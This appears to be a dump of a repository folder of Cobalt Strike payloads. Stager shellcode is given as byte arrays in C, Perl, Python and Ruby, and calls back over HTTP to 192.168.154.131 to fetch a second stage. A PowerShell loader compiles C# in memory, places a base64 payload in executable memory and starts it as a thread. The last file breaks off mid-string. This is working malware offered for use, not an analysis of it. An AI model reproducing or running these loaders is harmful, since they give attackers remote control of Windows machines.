0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x24, 0x05, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 
0xff, 0x2f, 0x6a, 0x48, 0x75, 0x35, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x32, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x36, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 
0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x35, 0x34, 0x2e, 0x31, 0x33, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00 };\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.pl",
    "content": "# length: 800 bytes\n$buf = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x6e\\x65\\x74\\x00\\x68\\x77\\x69\\x6e\\x69\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\x31\\xff\\x57\\x57\\x57\\x57\\x57\\x68\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xe9\\x84\\x00\\x00\\x00\\x5b\\x31\\xc9\\x51\\x51\\x6a\\x03\\x51\\x51\\x68\\x24\\x05\\x00\\x00\\x53\\x50\\x68\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x70\\x5b\\x31\\xd2\\x52\\x68\\x00\\x02\\x60\\x84\\x52\\x52\\x52\\x53\\x52\\x50\\x68\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x89\\xc6\\x83\\xc3\\x50\\x31\\xff\\x57\\x57\\x6a\\xff\\x53\\x56\\x68\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x84\\xc3\\x01\\x00\\x00\\x31\\xff\\x85\\xf6\\x74\\x04\\x89\\xf9\\xeb\\x09\\x68\\xaa\\xc5\\xe2\\x5d\\xff\\xd5\\x89\\xc1\\x68\\x45\\x21\\x5e\\x31\\xff\\xd5\\x31\\xff\\x57\\x6a\\x07\\x51\\x56\\x50\\x68\\xb7\\x57\\xe0\\x0b\\xff\\xd5\\xbf\\x00\\x2f\\x00\\x00\\x39\\xc7\\x74\\xb7\\x31\\xff\\xe9\\x91\\x01\\x00\\x00\\xe9\\xc9\\x01\\x00\\x00\\xe8\\x8b\\xff\\xff\\xff\\x2f\\x43\\x77\\x6d\\x35\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x6
1\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x31\\x30\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x36\\x2e\\x32\\x3b\\x20\\x57\\x69\\x6e\\x36\\x34\\x3b\\x20\\x78\\x36\\x34\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x36\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x00\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x68\\x00\\x00\\x40\\x00\\x57\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\xb9\\x00\\x00\\x00\\x00\\x01\\xd9\\x51\\x53\\x89\\xe7\\x57\\x68\\x00\\x20\\x00\\x00\\x53\\x56\\x68\\x12\\x96\\x89\\xe2\\xff\\xd5\\x85\\xc0\\x74\\xc6\\x8b\\x07\\x01\\xc3\\x85\\xc0\\x75\\xe5\\x58\\xc3\\xe8\\xa9\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x35\\x3
4\\x2e\\x31\\x33\\x31\\x00\\x00\\x00\\x00\\x00\";\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.ps1",
    "content": "Set-StrictMode -Version 2\n\n$eicar = 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\n\n$DoIt = @'\n$assembly = @\"\n\tusing System;\n\tusing System.Runtime.InteropServices;\n\tnamespace inject {\n\t\tpublic class func {\n\t\t\t[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }\n\t\t\t[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }\n\t\t\t[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }\n\t\t\t[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\n\t\t\t[DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\n\t\t\t[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);\n\t\t}\n\t}\n\"@\n\n$compiler = New-Object Microsoft.CSharp.CSharpCodeProvider\n$params = New-Object System.CodeDom.Compiler.CompilerParameters\n$params.ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))\n$params.GenerateInMemory = $True\n$result = $compiler.CompileAssemblyFromSource($params, $assembly)\n\n[Byte[]]$var_code = [System.Convert]::FromBase64String(\"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\")\n\n$buffer = [inject.func]::VirtualAlloc(0, $var_code.Length + 1, [inject.func+AllocationType]::Reserve -bOr [inject.func+AllocationType]::Commit, [inject.func+MemoryProtection]::ExecuteReadWrite)\nif ([Bool]!$buffer) { \n\t$global:result = 3; \n\treturn \n}\n[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $buffer, $var_code.Length)\n[IntPtr] $thread = [inject.func]::CreateThread(0, 0, $buffer, 0, 0, 0)\nif ([Bool]!$thread) {\n\t$global:result = 7; \n\treturn \n}\n$result2 = [inject.func]::WaitForSingleObject($thread, [inject.func+Time]::Infinite)\n'@\n\nIf ([IntPtr]::size 
-eq 8) {\n\tstart-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job\n}\nelse {\n\tIEX $DoIt\n}\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py",
    "content": "# length: 800 bytes\nbuf = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x6e\\x65\\x74\\x00\\x68\\x77\\x69\\x6e\\x69\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\x31\\xff\\x57\\x57\\x57\\x57\\x57\\x68\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xe9\\x84\\x00\\x00\\x00\\x5b\\x31\\xc9\\x51\\x51\\x6a\\x03\\x51\\x51\\x68\\x24\\x05\\x00\\x00\\x53\\x50\\x68\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x70\\x5b\\x31\\xd2\\x52\\x68\\x00\\x02\\x60\\x84\\x52\\x52\\x52\\x53\\x52\\x50\\x68\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x89\\xc6\\x83\\xc3\\x50\\x31\\xff\\x57\\x57\\x6a\\xff\\x53\\x56\\x68\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x84\\xc3\\x01\\x00\\x00\\x31\\xff\\x85\\xf6\\x74\\x04\\x89\\xf9\\xeb\\x09\\x68\\xaa\\xc5\\xe2\\x5d\\xff\\xd5\\x89\\xc1\\x68\\x45\\x21\\x5e\\x31\\xff\\xd5\\x31\\xff\\x57\\x6a\\x07\\x51\\x56\\x50\\x68\\xb7\\x57\\xe0\\x0b\\xff\\xd5\\xbf\\x00\\x2f\\x00\\x00\\x39\\xc7\\x74\\xb7\\x31\\xff\\xe9\\x91\\x01\\x00\\x00\\xe9\\xc9\\x01\\x00\\x00\\xe8\\x8b\\xff\\xff\\xff\\x2f\\x66\\x77\\x31\\x4e\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61
\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x31\\x30\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x36\\x2e\\x32\\x3b\\x20\\x57\\x69\\x6e\\x36\\x34\\x3b\\x20\\x78\\x36\\x34\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x36\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x00\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x68\\x00\\x00\\x40\\x00\\x57\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\xb9\\x00\\x00\\x00\\x00\\x01\\xd9\\x51\\x53\\x89\\xe7\\x57\\x68\\x00\\x20\\x00\\x00\\x53\\x56\\x68\\x12\\x96\\x89\\xe2\\xff\\xd5\\x85\\xc0\\x74\\xc6\\x8b\\x07\\x01\\xc3\\x85\\xc0\\x75\\xe5\\x58\\xc3\\xe8\\xa9\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x35\\x34
\\x2e\\x31\\x33\\x31\\x00\\x00\\x00\\x00\\x00\"\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.rb",
    "content": "# length: 800 bytes\nbuf = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x6e\\x65\\x74\\x00\\x68\\x77\\x69\\x6e\\x69\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\x31\\xff\\x57\\x57\\x57\\x57\\x57\\x68\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xe9\\x84\\x00\\x00\\x00\\x5b\\x31\\xc9\\x51\\x51\\x6a\\x03\\x51\\x51\\x68\\x24\\x05\\x00\\x00\\x53\\x50\\x68\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x70\\x5b\\x31\\xd2\\x52\\x68\\x00\\x02\\x60\\x84\\x52\\x52\\x52\\x53\\x52\\x50\\x68\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x89\\xc6\\x83\\xc3\\x50\\x31\\xff\\x57\\x57\\x6a\\xff\\x53\\x56\\x68\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x84\\xc3\\x01\\x00\\x00\\x31\\xff\\x85\\xf6\\x74\\x04\\x89\\xf9\\xeb\\x09\\x68\\xaa\\xc5\\xe2\\x5d\\xff\\xd5\\x89\\xc1\\x68\\x45\\x21\\x5e\\x31\\xff\\xd5\\x31\\xff\\x57\\x6a\\x07\\x51\\x56\\x50\\x68\\xb7\\x57\\xe0\\x0b\\xff\\xd5\\xbf\\x00\\x2f\\x00\\x00\\x39\\xc7\\x74\\xb7\\x31\\xff\\xe9\\x91\\x01\\x00\\x00\\xe9\\xc9\\x01\\x00\\x00\\xe8\\x8b\\xff\\xff\\xff\\x2f\\x75\\x43\\x50\\x54\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61
\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x31\\x30\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x36\\x2e\\x32\\x3b\\x20\\x57\\x69\\x6e\\x36\\x34\\x3b\\x20\\x78\\x36\\x34\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x36\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x00\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x68\\x00\\x00\\x40\\x00\\x57\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\xb9\\x00\\x00\\x00\\x00\\x01\\xd9\\x51\\x53\\x89\\xe7\\x57\